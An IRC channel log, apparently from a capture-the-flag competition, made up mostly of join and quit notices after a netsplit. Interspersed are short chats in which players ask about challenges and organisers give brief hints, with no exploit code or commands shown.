  6424. (00:16:06) ••• jOin: (fser) ([email protected])
  6425. (00:16:06) ••• jOin: (atem) ([email protected])
  6426. (00:16:06) ••• jOin: (C0deH4cker) ([email protected])
  6427. (00:16:06) ••• jOin: (javuto) ([email protected])
  6428. (00:16:06) ••• jOin: (crowell) ([email protected])
  6429. (00:16:06) ••• jOin: (lynks) (~lynks@unaffiliated/lynks)
  6430. (00:16:06) ••• jOin: (EiNSTeiN_) (~einstein@unaffiliated/einstein/x-615171)
  6431. (00:16:06) ••• jOin: (1JTAABBS9) ([email protected])
  6432. (00:16:06) ••• jOin: (Ptishell) ([email protected])
  6433. (00:16:06) ••• jOin: (Zibro) ([email protected])
  6434. (00:16:06) ••• jOin: (aterribleloss) (~quassel@2607:fe50:0:6300::130)
  6435. (00:16:06) ••• jOin: (lassimus) ([email protected])
  6436. (00:16:06) ••• jOin: (mbr_) (~mbr@2605:f700:c0:1::2975:a675)
  6437. (00:16:06) ••• jOin: (monsi) ([email protected])
  6438. (00:16:06) ••• jOin: (_simo) ([email protected])
  6439. (00:16:06) ••• jOin: (sdfsfdsfd) ([email protected])
  6440. (00:16:06) ••• jOin: (valis) ([email protected])
  6441. (00:16:07) ••• jOin: ([ToH]bp) ([email protected])
  6442. (00:16:07) ••• jOin: (hkr`) (~hkr@unaffiliated/hkr/x-6459160)
  6443. (00:16:07) ••• jOin: (oceanx) ([email protected])
  6444. (00:16:07) ••• jOin: (vesh) ([email protected])
  6445. (00:16:07) ••• jOin: (hadahash) (uid25580@gateway/web/irccloud.com/x-wsnoahgwqigwbhij)
  6446. (00:16:07) ••• jOin: (darklapu) ([email protected])
  6447. (00:16:07) ••• jOin: (tjbecker_) ([email protected])
  6448. (00:16:07) ••• jOin: (alamar) ([email protected])
  6449. (00:16:07) ••• jOin: (MaaaZ) ([email protected])
  6450. (00:16:07) ••• jOin: (sibios) (~sibios@unaffiliated/sibios)
  6451. (00:16:07) ••• jOin: (veorq) ([email protected])
  6452. (00:16:07) ••• jOin: (nolze) ([email protected])
  6453. (00:16:07) ••• jOin: (gouda) ([email protected])
  6454. (00:16:07) ••• jOin: (ltfish) ([email protected])
  6455. (00:16:07) ••• jOin: (a13k) (~a13k@unaffiliated/a13k)
  6456. (00:16:07) ••• jOin: (blackops) (chanlon@nat/google/x-fqbggxsqaldmygxi)
  6457. (00:16:07) ••• jOin: (gaby_) ([email protected])
  6458. (00:16:07) ••• jOin: (vladum) (vladum@nat/google/x-nystqscjkxmoowus)
  6459. (00:16:07) ••• jOin: (fuzyll) ([email protected])
  6460. (00:16:07) ••• jOin: (jiva) (~j@disekt/jiva)
  6461. (00:16:07) ••• jOin: (suspenders) (ident@2600:3c02::f03c:91ff:fe93:5570)
  6462. (00:16:07) ••• jOin: (HockeyInJune) (sid17970@gateway/web/irccloud.com/x-ctjiaaopkbcjhczm)
  6463. (00:16:07) ••• jOin: (molnarg) ([email protected])
  6464. (00:16:07) ••• jOin: (iZsh) ([email protected])
  6465. (00:16:07) ••• jOin: (grollicus_) ([email protected])
  6466. (00:16:07) ••• jOin: (jagger_) ([email protected])
  6467. (00:16:07) ••• jOin: (morphiend) ([email protected])
  6468. (00:16:07) ••• jOin: (zarul[afk]) ([email protected])
  6469. (00:16:08) ••• jOin: (arthurdent) ([email protected])
  6470. (00:16:08) ••• jOin: (scnarc) ([email protected])
  6471. (00:16:08) ••• jOin: (c671m) ([email protected])
  6472. (00:16:08) ••• jOin: (livinded) ([email protected])
  6473. (00:16:08) ••• jOin: (trelgak) ([email protected])
  6474. (00:16:08) ••• jOin: (xorrbit) ([email protected])
  6475. (00:16:08) ••• jOin: ([SH]mom) ([email protected])
  6476. (00:16:08) ••• jOin: (jinblack) ([email protected])
  6477. (00:16:08) ••• jOin: (synick) ([email protected])
  6478. (00:16:08) ••• jOin: (tyage) ([email protected])
  6479. (00:16:08) ••• jOin: (thecatbot) ([email protected])
  6480. (00:16:08) ••• jOin: (namrog84) ([email protected])
  6481. (00:16:08) ••• jOin: (connection) (~connectio@hacktalk/staff/connection)
  6482. (00:16:08) ••• jOin: (sven) ([email protected])
  6483. (00:16:08) ••• jOin: (mongo12) ([email protected])
  6484. (00:16:08) ••• jOin: (wmliang_) ([email protected])
  6485. (00:16:08) ••• jOin: (nurfed_) ([email protected])
  6486. (00:16:08) ••• jOin: ([int3]romansoft) ([email protected])
  6487. (00:16:08) ••• jOin: (bata) ([email protected])
  6488. (00:16:08) ••• jOin: (clockish) ([email protected])
  6489. (00:16:08) ••• jOin: (q3k) ([email protected])
  6490. (00:16:08) ••• jOin: (choppers) ([email protected])
  6491. (00:16:08) ••• jOin: ([pwn]haabb) ([email protected])
  6492. (00:16:08) ••• jOin: (wapiflap1) ([email protected])
  6493. (00:16:08) ••• jOin: (dcbz_) ([email protected])
  6494. (00:16:08) ••• jOin: (pipecork) ([email protected])
  6495. (00:16:08) ••• jOin: (isra17) ([email protected])
  6496. (00:16:08) ••• jOin: (ebeip90) ([email protected])
  6497. (00:16:08) ••• jOin: (Kasalehlia) ([email protected])
  6498. (00:16:08) ••• jOin: (dudes) ([email protected])
  6499. (00:16:08) ••• jOin: (pnX) (~pnx@unaffiliated/pnx)
  6500. (00:16:09) ••• jOin: (Gynvael) ([email protected])
  6501. (00:16:09) ••• jOin: (blankwall) ([email protected])
  6502. (00:16:09) ••• jOin: (HeadHunter) ([email protected])
  6503. (00:16:09) ••• jOin: (saxx) ([email protected])
  6504. (00:16:09) ••• jOin: (dunamis) (~dunamis@unaffiliated/dunamis)
  6505. (00:16:09) ••• jOin: (PHLAK) (~chris@unaffiliated/phlak)
  6506. (00:16:09) ••• jOin: (supersat) ([email protected])
  6507. (00:16:09) ••• jOin: (torvos) ([email protected])
  6508. (00:16:09) ••• jOin: (wonder-defbra) ([email protected])
  6509. (00:16:09) ••• jOin: (spectralsun) (~spectrals@unaffiliated/spectralsun)
  6510. (00:16:09) ••• mOde: (sendak.freenode.net) sets (+v clockish)
  6511. (00:16:09) ••• jOin: (hellok) ([email protected])
  6512. (00:16:09) ••• jOin: (slipper) ([email protected])
  6513. (00:16:09) ••• jOin: (zardus) ([email protected])
  6514. (00:16:09) ••• jOin: (Adrastei) ([email protected])
  6515. (00:16:09) ••• jOin: (moki) ([email protected])
  6516. (00:16:09) ••• jOin: (Im11Plus) ([email protected])
  6517. (00:16:09) ••• jOin: (marc-etienne) ([email protected])
  6518. (00:16:09) ••• jOin: (SLAZ) ([email protected])
  6519. (00:16:09) ••• jOin: (HENLEYbls) (sid16516@gateway/web/irccloud.com/x-rugekvlsuoumfzfg)
  6520. (00:16:09) ••• jOin: (mak`) ([email protected])
  6521. (00:16:09) ••• jOin: (ysje) ([email protected])
  6522. (00:16:09) ••• jOin: (Valodim) ([email protected])
  6523. (00:16:09) ••• jOin: (mike_pizza) ([email protected])
  6524. (00:16:10) ••• jOin: (Nothingness) (~internet@unaffiliated/nothingness)
  6525. (00:16:10) ••• jOin: (o1e6) ([email protected])
  6526. (00:16:10) ••• jOin: (majuscule) ([email protected])
  6527. (00:16:10) ••• jOin: (erye) (~erye@unaffiliated/erye)
  6528. (00:16:10) ••• jOin: (brogle) (~austin@unaffiliated/brogle)
  6529. (00:16:10) ••• jOin: (morla) ([email protected])
  6530. (00:16:10) ••• jOin: (gsilvis_) ([email protected])
  6531. (00:16:10) ••• jOin: (LuckyY) (~LuckY@unaffiliated/luckyy)
  6532. (00:16:10) ••• jOin: (xichzo) ([email protected])
  6533. (00:16:10) ••• jOin: (dropkick_) ([email protected])
  6534. (00:16:10) ••• jOin: (dbuq) (~quassel@unaffiliated/dbuq)
  6535. (00:16:10) ••• qUit: (tomcr00se) ([email protected]) Quit: leaving
  6536. (00:16:11) ••• nIck: (tylerni7) is now known as (16WAAD65R)
  6537. (00:16:11) ••• jOin: (Rstevoa) ([email protected])
  6538. (00:16:11) ••• jOin: (awesie) (~awesie@freenode/sponsor/awesie)
  6539. (00:16:11) ••• jOin: (zoidberg-) ([email protected])
  6540. (00:16:11) ••• jOin: (RyanWithZombies) ([email protected])
  6541. (00:16:11) ••• jOin: (cychao) ([email protected])
  6542. (00:16:12) ••• jOin: (DrunkenPanda) (~mpex@unaffiliated/drunkenpanda)
  6543. (00:16:12) ••• jOin: (ktrask) ([email protected])
  6544. (00:16:12) ••• jOin: (adam_i) ([email protected])
  6545. (00:16:12) ••• jOin: (cd1zz) (~pwnag3@unaffiliated/cd1zz)
  6546. (00:16:12) ••• jOin: (haakjes) (~user@unaffiliated/haakjes)
  6547. (00:16:13) ••• jOin: (tylerni7) (~tylerni7@unaffiliated/tylerni7)
  6548. (00:16:13) ••• mOde: (sendak.freenode.net) sets (+vv awesie tylerni7)
  6549. (00:16:14) ••• nIck: (tomcr00se_) is now known as (tomcr00se)
  6550. (00:16:14) ••• qUit: (knog) ([email protected]) Read error: Connection reset by peer
  6551. (00:16:17) (awesie_) \o/
  6552. (00:16:18) ••• pArt: (16WAAD67A) ([email protected]) "WeeChat 0.3.8"
  6553. (00:16:21) (tomcr00se) wow disaster
  6554. (00:16:25) (c1b3rh4ck) I've got a valid flag , but the system seems not validating it
  6555. (00:16:35) ••• jOin: (knog) ([email protected])
  6556. (00:16:36) ••• qUit: (knog) ([email protected]) Client Quit
  6557. (00:16:38) (+frozencemetery) c1b3rh4ck: what chal?
  6558. (00:16:41) (ricky) Woo, everyone's back
  6559. (00:16:41) (16WAAD7AR) oh got the netjoins
  6560. (00:16:46) (16WAAD7AR) aaahahahah
  6561. (00:16:47) (ricky) tomcr00se: Hey, you should do the web challenge. It is a quality challenge
  6562. (00:16:54) ••• jOin: (knog) ([email protected])
  6563. (00:17:22) ••• jOin: (KTlog_) ([email protected])
  6564. (00:17:23) ••• jOin: (mrsmith67) (uid11196@gateway/web/irccloud.com/session)
  6565. (00:17:23) ••• jOin: (zTrix) (~zTrix@2402:f000:5:7a01:343f:c90d:c71f:8530)
  6566. (00:17:23) ••• jOin: (f00b4r) ([email protected])
  6567. (00:17:23) ••• jOin: (kmowery) ([email protected])
  6568. (00:17:23) ••• jOin: (eastwolf__) ([email protected])
  6569. (00:17:23) ••• jOin: (netsurf3) ([email protected])
  6570. (00:17:23) ••• jOin: (abcert) ([email protected])
  6571. (00:17:23) ••• jOin: (jarCrack) ([email protected])
  6572. (00:17:23) ••• jOin: (knuckles) ([email protected])
  6573. (00:17:23) ••• jOin: (DKay) (uid11914@gateway/web/irccloud.com/x-hwffhwtrovwugdvc)
  6574. (00:17:24) (16WAAD7AR) but where is ChanServ
  6575. (00:17:27) (+mserrano) Oh god
  6576. (00:17:28) ••• jOin: (Amnesia) ([email protected])
  6577. (00:17:28) ••• jOin: ([pwn]TM) ([email protected])
  6578. (00:17:28) ••• jOin: (kiwhacks) (~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128)
  6579. (00:17:28) ••• jOin: (kurtisebear) (sid28273@gateway/web/irccloud.com/x-ettntmmjyjvsqznk)
  6580. (00:17:28) ••• jOin: (mathiasbynens) (sid2247@gateway/web/irccloud.com/x-bahgxrmimlqnassq)
  6581. (00:17:28) ••• jOin: (architekt) ([email protected])
  6582. (00:17:28) ••• jOin: (javex) (javex@2a01:7e00::f03c:91ff:fe70:76f8)
  6583. (00:17:31) (tomcr00se) ricky: that yours?
  6584. (00:17:31) (16WAAD7AR) aaaahahaa
  6585. (00:17:36) (ricky) tomcr00se: It's the best web challenge ever
  6586. (00:17:36) ••• jOin: (zoomequipd) (~zoomequip@gateway/tor-sasl/zoomequipd)
  6587. (00:17:36) ••• jOin: (depierre) ([email protected])
  6588. (00:17:36) ••• jOin: (smd) ([email protected])
  6589. (00:17:36) ••• jOin: (devotchka) (~Hi@unaffiliated/n00dl3)
  6590. (00:17:36) ••• jOin: (marcoscars02) (~ms02@unaffiliated/marcoscars02)
  6591. (00:17:36) ••• jOin: (maikol) (~deth@disekt/maikol)
  6592. (00:17:36) ••• jOin: (bs`) (~bs@gateway/tor-sasl/bs/x-48276796)
  6593. (00:17:36) ••• jOin: (colona) ([email protected])
  6594. (00:17:36) ••• jOin: (dzeta) ([email protected])
  6595. (00:17:36) ••• jOin: (asby) ([email protected])
  6596. (00:17:36) ••• jOin: (Reinhart) ([email protected])
  6597. (00:17:36) ••• jOin: (tweek_) ([email protected])
  6598. (00:17:36) ••• jOin: (Nanomebia) ([email protected])
  6599. (00:17:39) ••• nIck: (dickoff) is now known as (16WAAD66A)
  6600. (00:17:39) ••• nIck: (chunderstruck) is now known as (16WAAD6K4)
  6601. (00:17:40) (ricky) tomcr00se: (Yeah, it's mine)
  6602. (00:17:42) ••• jOin: (_blasty_) ([email protected])
  6603. (00:17:42) ••• jOin: (plo) ([email protected])
  6604. (00:17:42) ••• jOin: (dwlewis) ([email protected])
  6605. (00:17:42) ••• jOin: (KT) ([email protected])
  6606. (00:17:42) ••• jOin: (kevin``) ([email protected])
  6607. (00:17:42) ••• jOin: (stach) ([email protected])
  6608. (00:17:42) ••• jOin: (larsan) (~larsan@2001:1a50:11:0:5f:8f:acac:1)
  6609. (00:17:42) ••• jOin: (NK_) ([email protected])
  6610. (00:17:42) ••• jOin: (neodyblue) (~neodyblue@2001:41d0:8:796e::1)
  6611. (00:17:42) ••• jOin: (TobalJackson) ([email protected])
  6612. (00:17:42) ••• jOin: (audioPhil) (~quassel@unaffiliated/audiophil1)
  6613. (00:17:42) ••• jOin: (warrick) (~warrick@disekt/warrick)
  6614. (00:17:42) ••• jOin: (piroko) ([email protected])
  6615. (00:17:42) ••• jOin: (21WAAB8NP) ([email protected])
  6616. (00:17:43) ••• jOin: (robbje) ([email protected])
  6617. (00:17:43) ••• jOin: (dickoff) (~dickoff@unaffiliated/dickoff)
  6618. (00:17:43) ••• jOin: (X-N2O_) ([email protected])
  6619. (00:17:43) ••• jOin: (akiym_) ([email protected])
  6620. (00:17:43) ••• jOin: (thomakj) (~thomakj@2001:700:300:1430:c5cd:9a66:6e38:98d6)
  6621. (00:17:43) ••• jOin: (comawill) (~quassel@2001:6f8:900:90f4:3d42:cdb9:9fef:36cd)
  6622. (00:17:43) ••• jOin: (schrodinger) ([email protected])
  6623. (00:17:43) ••• mOde: (sendak.freenode.net) sets (+v dickoff)
  6624. (00:17:43) (tomcr00se) haha, i'm scared
  6625. (00:17:49) (Brooklynt_Overfl) can I PM a mod about kappa
  6626. (00:17:49) ••• nIck: (f00b4r) is now known as (7F1AAAJON)
  6627. (00:17:50) (+mserrano) FREENOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOODDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE
  6628. (00:17:52) (16WAAD7AR) tomcr00se: solve the web challenge, we really want at least one solve
  6629. (00:17:53) ••• jOin: (Sin__) ([email protected])
  6630. (00:17:53) ••• jOin: (dnivra) ([email protected])
  6631. (00:17:53) ••• jOin: (moeyebus) (~moeyebus@unaffiliated/moebius-eye/x-4065625)
  6632. (00:17:53) ••• jOin: (j0f) ([email protected])
  6633. (00:17:53) ••• jOin: (shadghost) ([email protected])
  6634. (00:17:53) ••• jOin: (fasmotol) ([email protected])
  6635. (00:17:53) ••• jOin: (poppopret) ([email protected])
  6636. (00:17:53) ••• jOin: (nopple) ([email protected])
  6637. (00:17:53) ••• jOin: (maurer) ([email protected])
  6638. (00:17:53) ••• jOin: (Apple_Eater) ([email protected])
  6639. (00:17:53) ••• jOin: (18VAAD0FH) ([email protected])
  6640. (00:17:53) ••• jOin: (Cimmi) ([email protected])
  6641. (00:17:53) ••• jOin: (toxickappa) ([email protected])
  6642. (00:17:53) ••• jOin: (lanjelot) ([email protected])
  6643. (00:17:53) ••• jOin: (oldtopman) (~oldtopman@unaffiliated/oldtopman)
  6644. (00:17:53) ••• jOin: (dwn) (~cute@unaffiliated/daman)
  6645. (00:17:53) ••• jOin: (HighFiveBell) ([email protected])
  6646. (00:17:53) ••• jOin: (synthverity) ([email protected])
  6647. (00:17:53) ••• jOin: (Atlantic777) (~Atlantic7@unaffiliated/atlantic777)
  6648. (00:17:53) ••• jOin: (Phshap) ([email protected])
  6649. (00:17:53) ••• jOin: (soleblaze) (~soleblaze@unaffiliated/soleblaze)
  6650. (00:17:53) ••• jOin: (mak) ([email protected])
  6651. (00:17:53) ••• jOin: (Lopi) ([email protected])
  6652. (00:17:53) ••• jOin: (grimmlin_) ([email protected])
  6653. (00:17:54) ••• jOin: (chuckleberry) (nemo@nat/dcunetworkingsociety/x-xnvlmuckkglgpyek)
  6654. (00:17:54) ••• jOin: (mischa__) ([email protected])
  6655. (00:17:54) ••• jOin: (wyatt_earp) ([email protected])
  6656. (00:17:54) ••• jOin: (nbdy) ([email protected])
  6657. (00:17:54) ••• jOin: (irdan) (reicherd@osuosl/staff/irdan)
  6658. (00:17:54) ••• jOin: (WuZ) ([email protected])
  6659. (00:17:54) ••• jOin: (j00ru) ([email protected])
  6660. (00:17:54) ••• jOin: (Lympho|DrgnS) ([email protected])
  6661. (00:17:54) ••• jOin: (computerality) ([email protected])
  6662. (00:17:54) ••• jOin: (danitorwS) (~danitorwS@unaffiliated/danitorws)
  6663. (00:17:54) ••• jOin: (kalenz) ([email protected])
  6664. (00:17:54) ••• jOin: (jix) ([email protected])
  6665. (00:17:54) ••• jOin: (skier_) ([email protected])
  6666. (00:17:54) ••• jOin: (tsuro) ([email protected])
  6667. (00:17:54) ••• jOin: (_275o) ([email protected])
  6668. (00:17:54) ••• jOin: (ircc3) ([email protected])
  6669. (00:17:56) (tomcr00se) i have a few easy points first
  6670. (00:17:59) ••• qUit: (Sin__) ([email protected]) Quit: Sin__
  6671. (00:17:59) (c1b3rh4ck) heartbleed
  6672. (00:17:59) (arthurdent) yay denesplot
  6673. (00:18:03) ••• jOin: (Sin__) ([email protected])
  6674. (00:18:11) (16WAAD66A) Brooklynt_Overfl: me
  6675. (00:18:12) (+mserrano) c1b3rh4ck: your key is probably not correct
  6676. (00:18:15) (ricky) tomcr00se: The first part of the web challenge is easy enough, the last part is probably more of a pain
  6677. (00:18:17) (+mserrano) PM me what you think it is
  6678. (00:18:21) (16WAAD66A) Brooklynt_Overfl: oh wait
  6679. (00:18:28) (Brooklynt_Overfl) 16WAAD66A: you don't have ops bro
  6680. (00:18:36) (+mserrano) that's dickoff
  6681. (00:18:37) (+dickoff) Brooklynt_Overfl: me lol
  6682. (00:18:39) (ricky) Hahaha
  6683. (00:18:41) (+mserrano) he just got wrecked by services
  6684. (00:18:42) (+mserrano) lol
  6685. (00:18:54) ••• qUit: (16WAAD7AR) ([email protected])
  6686. (00:18:57) (+frozencemetery) #rekt
  6687. (00:18:59) (nopple) ricky: if your web challenge was intended to go where i'm going, i definitely approve :)
  6688. (00:19:01) ••• qUit: (knog) ([email protected]) Remote host closed the connection
  6689. (00:19:11) (+mserrano) nopple: "web"
  6690. (00:19:18) ••• jOin: (AnthraX101) ([email protected])
  6691. (00:19:25) (ricky) nopple: :-P
  6692. (00:19:36) (+awesie) 01:20 [Freenode] -!- NickServ [[email protected]]
  6693. (00:21:27) ••• qUit: (stypr_irccloud) (sid16290@gateway/web/irccloud.com/session) Changing host
  6694. (00:21:27) ••• jOin: (stypr_irccloud) (sid16290@gateway/web/irccloud.com/x-qlhoqhwnnieuwlxm)
  6695. (00:21:36) (+frozencemetery) brutal
  6696. (00:21:43) (+awesie) how are people doing on harry_potter?
  6697. (00:21:55) (ricky) nopple: Would be interested to hear where you are and where you think it's going in PM if you're not too busy looking :-)
  6698. (00:22:00) ••• qUit: (mrsmith67) (uid11196@gateway/web/irccloud.com/session) Changing host
  6699. (00:22:01) ••• jOin: (mrsmith67) (uid11196@gateway/web/irccloud.com/x-wrpmyrgkuuglgdje)
  6700. (00:22:50) ••• nIck: (16WAAD7CE) is now known as ([SH]mom_)
  6701. (00:25:27) (AnthraX101) is wheeeee working? it appears to just disconnect after solving the proof of work and giving it an encryption string
  6702. (00:25:34) ••• qUit: (16WAAD66A) ([email protected]) Quit: WeeChat 0.4.1
  6703. (00:25:54) (+mserrano) AnthraX101: hm
  6704. (00:26:20) ••• qUit: (awesie_) ([email protected]) Quit: leaving
  6705. (00:26:46) (+mserrano) [NickServ] ([email protected])
  6706. (00:28:17) (ricky) OK. So...
  6707. (00:28:26) (+mserrano) AnthraX101: (am checking)
  6708. (00:28:30) (+mserrano) (proof of work takes a bit)
  6709. (00:28:37) (AnthraX101) Thanks
  6710. (00:29:08) ••• jOin: (nonroot) ([email protected])
  6711. (00:29:43) (+mserrano) AnthraX101: responded to me
  6712. (00:29:47) (+mserrano) and sent me back stuff
  6713. (00:29:51) (AnthraX101) Ok, thanks.
  6714. (00:29:58) (+mserrano) you have to send it stuff encoded in hex I think
  6715. (00:30:06) (AnthraX101) Ohhh, thanks!
  6716. (00:30:18) (ricky) ANNOUNCEMENT: bronies is not intended to be solved via client side exploits - if you manage to do so though, that's fair game
  6717. (00:30:19) (+mserrano) I should put that in the description
  6718. (00:30:40) ••• jOin: (justinsteven) (~justinste@unaffiliated/justinsteven)
  6719. (00:30:40) ••• jOin: (epochtato) (~epochfail@ec2-54-252-29-104.ap-southeast-2.compute.amazonaws.com)
  6720. (00:30:40) ••• jOin: (doom) ([email protected])
  6721. (00:30:40) ••• jOin: (Dettorer) ([email protected])
  6722. (00:30:40) ••• jOin: (PoopyPantsSr) ([email protected])
  6723. (00:30:40) ••• jOin: (dug) ([email protected])
  6724. (00:30:40) ••• jOin: (gbarboza) ([email protected])
  6725. (00:30:40) ••• jOin: (pouete) (~pouete@unaffiliated/pouete)
  6726. (00:30:41) ••• jOin: (stypr) ([email protected])
  6727. (00:30:41) ••• jOin: (DooMMasteR) (~DooMMaste@unaffiliated/doommaster)
  6728. (00:30:41) ••• jOin: (foundation) ([email protected])
  6729. (00:30:41) ••• jOin: (zenofex) ([email protected])
  6730. (00:30:41) ••• jOin: (dontpanic42) ([email protected])
  6731. (00:30:41) ••• jOin: (bspar) ([email protected])
  6732. (00:30:41) ••• jOin: (64MAAAR6O) ([email protected])
  6733. (00:30:41) ••• jOin: (MercX) ([email protected])
  6734. (00:30:41) ••• jOin: (Dad`) (~Dad@unaffiliated/dad/x-6432127)
  6735. (00:30:41) ••• jOin: (silesm) ([email protected])
  6736. (00:30:41) ••• jOin: (Zerith) (~kvirc@unaffiliated/zerith)
  6737. (00:30:41) ••• jOin: (okami41) ([email protected])
  6738. (00:30:41) ••• jOin: (hj) ([email protected])
  6739. (00:30:41) ••• jOin: (dreyer) ([email protected])
  6740. (00:30:41) ••• jOin: (Aegil) ([email protected])
  6741. (00:30:41) ••• jOin: (f0rki) ([email protected])
  6742. (00:30:41) ••• jOin: (64MAAAC71) ([email protected])
  6743. (00:30:41) ••• jOin: (x6d61726b) ([email protected])
  6744. (00:30:41) ••• jOin: (ZoczuS) ([email protected])
  6745. (00:32:23) (ricky) I do consider the non-webkit method to be significantly easier though :_)
  6746. (00:33:30) ••• qUit: (DrunkenPanda) (~mpex@unaffiliated/drunkenpanda) Ping timeout: 252 seconds
  6747. (00:34:26) (tomcr00se) omg how'd you all do whatscat
  6748. (00:34:44) ••• qUit: (hadahash) (uid25580@gateway/web/irccloud.com/x-wsnoahgwqigwbhij) Quit: Connection closed for inactivity
  6749. (00:34:50) (AnthraX101) mserrano: Thanks, that worked for me!
  6750. (00:34:56) (+mserrano) tomcr00se: gotta pull together your webhacking skills
  6751. (00:35:04) (tomcr00se) like...i have the exploits
  6752. (00:35:05) (ricky) tomcr00se: Hey you should practice on bronies
  6753. (00:35:17) (ricky) Then you'll have the skills to solve whatscat!
  6754. (00:35:37) ••• pArt: (c1b3rh4ck) ([email protected]) "Ciao Leaving Channel"
  6755. (00:36:10) (jduck) this game is too easy when you have ubuntu remote ring0 0day!
  6756. (00:36:28) (ricky) Hehe
  6757. (00:36:37) (+mserrano) yeah man
  6758. (00:36:44) (+mserrano) it's like defcon when you have an autopwn program
  6759. (00:36:54) (+mserrano) which we totally have amirite guys
  6760. (00:36:58) ••• jOin: (Comrade_Badger) ([email protected])
  6761. (00:37:01) (psifertex) ahaha, just noticed the "largestctf.com" reference. lulz.
  6762. (00:37:06) (+mserrano) psifertex: :D
  6763. (00:37:12) (ricky) :-P
  6764. (00:37:31) (+awesie) Due to the lack of pwning against harry_potter, point value has been doubled!
  6765. (00:37:40) (+awesie) Hack more plz~!
  6766. (00:37:41) (psifertex) mserrano: absolutely, I read it in the news, so it must be true. or maybe a guy I heard from told me he read it in the news. one of the two.
  6767. (00:37:48) (bool_101) oh nice
  6768. (00:37:49) (jduck) ok not really, but i thought it was an interesting thought exercise =)
  6769. (00:38:16) ••• nIck: (bool_101) is now known as (bool101)
  6770. (00:38:30) • jduck just watched anchorman
  6771. (00:38:31) (jduck) 2
  6772. (00:39:02) (+dickoff) jduck: I heard it was terrible
  6773. (00:40:32) (jduck) imdb has 6.2/10, i think that's pretty accurate
  6774. (00:40:36) (+mserrano) so
  6775. (00:40:39) (+mserrano) pretty mediocre
  6776. (00:40:43) (jduck) there were definitely a couple of crackups in there =)
  6777. (00:40:49) (jduck) arguably those make it all worth it
  6778. (00:42:52) ••• jOin: (inter) ([email protected])
  6779. (00:45:30) (tomcr00se) awesie: 400 points and i'll do it :P
  6780. (00:45:42) (+mserrano) 300 is a lotta points
  6781. (00:45:50) (tomcr00se) ricky: i'm stuck on bronies
  6782. (00:45:56) (ricky) tomcr00se: Yeah! It's the best web problem ever!
  6783. (00:46:09) (18VAAD0FH) I cant stop watching spiderman and the ponies
  6784. (00:46:27) (18VAAD0FH) oh and reading what people are posting somewhere...
  6785. (00:46:32) (ricky) Haha
  6786. (00:46:39) (tomcr00se) i really think you are looking for a webkit exploit
  6787. (00:46:44) ••• qUit: ([ToH]bp) ([email protected]) Remote host closed the connection
  6788. (00:47:12) (+mserrano) would we really do that?
  6789. (00:47:13) (ricky) tomcr00se: I'm not
  6790. (00:47:32) ••• qUit: (nonroot) ([email protected]) Ping timeout: 258 seconds
  6791. (00:47:33) (ricky) There's a much easier way to solve this - I didn't realize that the latest stable phantomjs was vulnerable :-(
  6792. (00:47:34) ••• jOin: (x56) ([email protected])
  6793. (00:48:17) ••• jOin: (lavish) (~lavish@gentoo/user/lavish)
  6794. (00:49:27) (ricky) Whelp, let me know if anybody finds any interesting or less obvious bugs in bronies - hoping somebody makes it to the next step soon :-)
  6795. (00:49:47) (phiber__) my next step is going to sleep
  6796. (00:50:01) ••• jOin: (asdfasdgag) (6cab7303@gateway/web/freenode/session)
  6797. (00:50:02) ••• jOin: ([SF]testdata) (75c1a957@gateway/web/freenode/session)
  6798. (00:50:02) ••• jOin: (almac) (458cf96e@gateway/web/freenode/ip.69.140.249.110)
  6799. (00:50:02) ••• jOin: (bobsteam) (1817f0b6@gateway/web/freenode/session)
  6800. (00:50:02) ••• jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/session)
  6801. (00:50:02) ••• jOin: (cxc123) (ca780766@gateway/web/freenode/session)
  6802. (00:50:02) ••• jOin: (43UAABJS1) (d1cb4e22@gateway/web/freenode/session)
  6803. (00:50:03) ••• jOin: (eastwolf_) (ad42d345@gateway/web/freenode/ip.173.66.211.69)
  6804. (00:50:03) ••• jOin: (deder) (d4293493@gateway/web/freenode/ip.212.41.52.147)
  6805. (00:50:03) ••• jOin: (haoz) (b44ac723@gateway/web/freenode/ip.180.74.199.35)
  6806. (00:50:03) ••• jOin: (l0l0l) (932e7f69@gateway/web/freenode/ip.147.46.127.105)
  6807. (00:50:03) ••• jOin: (hoxy) (5d53a8a2@gateway/web/freenode/ip.93.83.168.162)
  6808. (00:50:03) ••• jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
  6809. (00:50:04) ••• qUit: (cxc123) (ca780766@gateway/web/freenode/session) Quit: Page closed
  6810. (00:50:08) ••• qUit: (43UAABJS1) (d1cb4e22@gateway/web/freenode/session) Changing host
  6811. (00:50:08) ••• jOin: (43UAABJS1) (d1cb4e22@gateway/web/freenode/ip.209.203.78.34)
  6812. (00:50:09) ••• qUit: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/session) Changing host
  6813. (00:50:09) ••• jOin: (thedoctordmc) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186)
  6814. (00:50:10) ••• qUit: (bobsteam) (1817f0b6@gateway/web/freenode/session) Changing host
  6815. (00:50:10) ••• jOin: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
  6816. (00:50:10) ••• qUit: ([SF]testdata) (75c1a957@gateway/web/freenode/session) Changing host
  6817. (00:50:10) ••• jOin: ([SF]testdata) (75c1a957@gateway/web/freenode/ip.117.193.169.87)
  6818. (00:50:11) ••• qUit: (asdfasdgag) (6cab7303@gateway/web/freenode/session) Changing host
  6819. (00:50:11) ••• jOin: (asdfasdgag) (6cab7303@gateway/web/freenode/ip.108.171.115.3)
  6820. (00:51:35) (auscompgeek) what the actual netsplit.
  6821. (00:52:19) (18VAAD0FH) what tool is used to do whatcat, burp, nikto, python, perl, sqlmap, sqli, csrf...
  6822. (00:52:38) (ricky) python requests is awesome for web challenges
  6823. (00:52:49) (+mserrano) auscompgeek: lol
  6824. (00:53:07) (18VAAD0FH) curl up with a nice python....if you follow that, get a life haha
  6825. (00:53:37) ••• jOin: (cylindrical) (76f3c596@gateway/web/freenode/ip.118.243.197.150)
  6826. (00:54:28) (cylindrical) any hints on kpop? write to which file?
  6827. (00:54:44) (+mserrano) cylindrical: you have basically no write permissions
  6828. (00:54:57) ••• jOin: ([ToH]rbino) ([email protected])
  6829. (00:55:00) (tomcr00se) can i use dirbuster?
  6830. (00:55:03) (tomcr00se) on bronies?
